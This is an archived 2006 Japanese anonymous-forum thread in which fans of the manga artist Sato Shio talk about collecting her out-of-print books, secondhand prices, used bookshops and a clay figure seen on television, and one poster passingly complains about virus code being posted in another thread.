ミノル「ここの中華粥、絶品だよ(大意)」
       ↑
すごーく美味しそうだったw

たしかヒカルのおごりで、アイツー内のどっかのレストランでの会話。

215 :花と名無しさん:2006/12/08(金) 21:42:14 ID:???0
楽天フリマにたくさん出品されていた佐藤さんの漫画は今どこに。
欲しいもの全部片っ端から買っとけばよかった。
楽天なんか嫌いだ。
増刷してくれない出版社も嫌いだ。

216 :花と名無しさん:2006/12/08(金) 23:35:01 ID:???0
私はまんだらけとヤフオクで揃えてる最中。
しかし「竜の夢〜」は手が出ない。\7000以上のプレミア付いてるんだもん

217 :花と名無しさん:2006/12/09(土) 19:18:00 ID:???0
うひぇーマジ?
オレ持ってるの売ろうかな・・・




イヤイヤイヤイヤダメダメダメダメ

218 :花と名無しさん:2006/12/09(土) 19:29:39 ID:???0
「竜の夢〜」ってそんなことになってるのか!
自分も同居人も持ってるんで、うちには二冊あるんだよな。
これはどっかに放出した方が、世のファンのためだろうか。

219 :花と名無しさん:2006/12/09(土) 21:33:28 ID:???0
ヤフオクやらないから、アマゾンで出して下さいませんか。

220 :花と名無しさん:2006/12/10(日) 01:52:09 ID:???0
「竜の夢〜」は佐藤さんの絶版本の中でも飛び抜けて高い
相場相当かはわかんないけど、こないだヲチしてたやつ
↓ \6800スタート高杉!! って思ってたら更に競ってるし
http://page10.auctions.yahoo.co.jp/jp/auction/m38940939

221 :花と名無しさん:2006/12/10(日) 14:22:45 ID:???0
>>215
出版社も商売だから仕方ないんだよ
勘弁してやってくれないか

222 :花と名無しさん:2006/12/10(日) 17:03:57 ID:???0
竜の夢〜
以前お世話になったネット古書店数店今見てみたら
どこも売り切れ状態だった
でも5000円ぐらいだった オクより安いよ
再入荷待ってみてはどう?リクエストしておくと
結構お値打ちで入るよ って古書店の回し者じゃないけどね

223 :花と名無しさん:2006/12/11(月) 00:01:02 ID:???0
私も古書店で5000円くらいで買いました。
案外ぐぐってると出てくるよー。

224 :219:2006/12/11(月) 00:56:30 ID:???0
そっか、みなさんどうもありがとう。
もっとちゃんと検索してみます。
リクエストができるとは知らなかったよ。
もう一息二息、頑張ってみます。

225 :花と名無しさん:2006/12/12(火) 21:37:00 ID:???0
今日、アリス・ブックTを手に入れた。
これで、佐藤史生の作品は、完全補完したとおもう・・・
しかし、コミックスになったら買おうとして、アリス・ブックTをスルーしてしまい
手に入れるまで15年、長かったなぁ〜
コミックスになっていないのは、「雨の竜」と「竜の姫君」だけだと思うんだけど
他にあったっけか?
ちなみに、「雨の竜」は、話題の「竜の夢〜」を持ってるので・・・

226 :花と名無しさん:2006/12/15(金) 19:37:35 ID:???0
>>196
エジプトではないのですが、自分もそっくりな像を見たことがあります。
NHKか何かの番組で、一瞬だけだったのですが、たしか獣頭神像とかいう名前で、中国か、朝鮮半島の土偶だったような・・・?
犬・馬・鳥・蛇頭の焼き物で、見たときは本当にそのまんまだー、と思った記憶があります。

もう一度見たくて、あちこち探しているのですが、なかなか見つけることができないでいます。


227 :花と名無しさん:2006/12/18(月) 14:53:38 ID:???0
朝日新聞の「ミイラと古代エジプト展」のトップページに
それらしき焼き物が載ってるね。

228 :花と名無しさん:2006/12/21(木) 14:26:06 ID:???0
神社乗っ取り事件でお稲荷様→ワン・ゼロのことを思い出してしまった

229 :花と名無しさん:2006/12/24(日) 10:50:54 ID:???0
諸星大二郎スレでちょっと話題に上がってたので報告してみる

230 :花と名無しさん:2006/12/27(水) 10:35:46 ID:???0
少女漫画板の某スレって、
新しくなるたびに必ずだれかがウイルスコード入れるんだな
恨みでもあんのかなー

スレ違いだけど愚痴ってみる

231 :花と名無しさん:2006/12/27(水) 14:25:13 ID:???0
ああ読んでる
他のお気に入り作家の名前があがったりするけど被るわ

67 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)